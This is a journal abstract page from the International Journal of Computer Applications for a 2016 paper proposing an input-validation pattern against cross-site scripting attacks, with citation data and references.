CFP last date
20 December 2024
Call for Paper
January Edition
IJCA solicits high quality original research papers for the upcoming January edition of the journal. The last date of research paper submission is 20 December 2024

Submit your paper
Know more
The week's pick
Responsive image
Improved Shuffled Frog Leaping Algorithm with Self-Adaptive Shuffling for Fuzzy Logic PD+G Controller Optimization in Robotic Manipulators

Duc Hoang Nguyen
Random Articles
Reseach Article

Presentation of a Pattern to Counteract the Attacks of XSS Malware

by Abbas Ali Najjari, Nasser Modiri
journal cover thumbnail

International Journal of Computer Applications
Foundation of Computer Science (FCS), NY, USA
Volume 143 - Number 2
Year of Publication: 2016
Authors: Abbas Ali Najjari, Nasser Modiri
10.5120/ijca2016910014

Abbas Ali Najjari, Nasser Modiri . Presentation of a Pattern to Counteract the Attacks of XSS Malware. International Journal of Computer Applications. 143, 2 ( Jun 2016), 5-11. DOI=10.5120/ijca2016910014

@article{ 10.5120/ijca2016910014,
author = { Abbas Ali Najjari, Nasser Modiri },
title = { Presentation of a Pattern to Counteract the Attacks of XSS Malware },
journal = { International Journal of Computer Applications },
issue_date = { Jun 2016 },
volume = { 143 },
number = { 2 },
month = { Jun },
year = { 2016 },
issn = { 0975-8887 },
pages = { 5-11 },
numpages = {9},
url = { https://ijcaonline.org/archives/volume143/number2/25047-2016910014/ },
doi = { 10.5120/ijca2016910014 },
publisher = {Foundation of Computer Science (FCS), NY, USA},
address = {New York, USA}
}
%0 Journal Article
%1 2024-02-06T23:45:14.897999+05:30
%A Abbas Ali Najjari
%A Nasser Modiri
%T Presentation of a Pattern to Counteract the Attacks of XSS Malware
%J International Journal of Computer Applications
%@ 0975-8887
%V 143
%N 2
%P 5-11
%D 2016
%I Foundation of Computer Science (FCS), NY, USA
Abstract

Cross Site programming (XSS) is the script attack in web pages, and it is accounted as one of the most dangerous problems of web applications. The researchers of security have investigated on different problems and they have found that the XSS vulnerability exists in many of known websites. The vulnerability is applied when an attacker reaches to an authorized user’s web explorer optionally and he/she might do cookie theft, develop destructive software, thieve the session and change the path of destruction. The validation of the user’s input is the first obstacle to protect the web applications against this vulnerability. The main aim of improving the security of web applications is improvement in the quality of user’s input validation. Unfortunately, the web application developers usually forget the user’s input validation and/or implement a weak validation. In this paper, it is attempted to present a pattern to validate the user’s input correctly in the web applications, and the obtained results are compared with the tools of scanning the existing vulnerability.

References
  1. Andrews, A., Offutt, J., Alexander, R. “Testing web applications by modeling with fsms”. Software Syst. Model. 4 (3), 326–345, 2005.
  2. Avancini, M. Ceccato, F.B. Kessler, “Grammar Based Oracle for SecurityTesting of Web Applications”, in: 7th International Workshop on Automation of Software Test (AST), no. line 13, pp. 15–21, 2012.
  3. Common Vulnerabilities and Exposures (The Standard for Information Security Vulnerability Names) http://cwe.mitre.org/
  4. D. Balzarotti et al., “Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications,” Proc. 29th IEEE Symp. Security and Privacy, IEEE CS, pp. 387-401, 2008.
  5. H. Shahriar and M. Zulkernine, “MUTEC: Mutation-Based Testing of Cross Site Scripting,” Proc. 5th Int’l Workshop Software Eng. for Secure Systems (SESS 09), IEEE, pp. 47-53, 2009.
  6. Isatou Hydara, Abu Bakar Md. Sultan, Current state of research on cross-site scripting (XSS) – A systematic literature review, Elsevier, Volume 58, February, Pages 170–186, 2015.
  7. José Fonseca, Marco Vieira, Henrique Madeira, “Testing and comparing web vulnerability scanning tools for SQL injection and XSS attacks”, in: 13th IEEE International Symposium on Pacific Rim Dependable Computing.p.365,372,2007.
  8. L.K. Shar, H.B.K. Tan, “Predicting common web application vulnerabilities from input validation and sanitization code patterns”, in: Proc. 27th IEEE/ACM Int. Conf. Autom. Softw. Eng. – ASE, p. 310, 2012
  9. M.S. Lam et al., “Securing Web Applications with Static and Dynamic Information Flow Tracking,” Proc. 2008 ACM SIGPLAN Symp. Partial Evaluation and Semantics-Based Program Manipulation (PEPM 08), ACM, pp. 3-12, 2008
  10. N. Li et al., “Perturbation-Based User-Input-Validation Testing of Web Applications,” J. Systems and Software, Nov. 2010, pp. 2263-2274
  11. Open Web Application Security Project, XSS (Cross-Site Scripting), Prevention Cheat Sheet, 2015; https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_ Prevention_Cheat_Sheet.
  12. R.B. Brinhosa, C.M. Westphall, C.B. Westphall, “Proposal and Development of the Web Services Input Validation Model”, in: IEEE Network Operations and Management Symposium (NOMS), pp. 643–646, 2012.
  13. R. Komiya, I. Paik, M. Hisada, “Classification of malicious web code by machine learning”, in: 3rd International Conference on Awareness Science and Technology iCAST, pp. 406–411, 2011.
  14. S. Fogie et al., XSS Attacks: Cross Site Scripting Exploits and Defense, Syngress, 2007.
  15. White Hat Security Website Stats Report 2015, https://info.whitehatsec.com/Website-Stats-Report-2015.html
Index Terms

Computer Science
Information Sciences

Keywords

web vulnerabilities input validation XSS malware

Powered by PhDFocusTM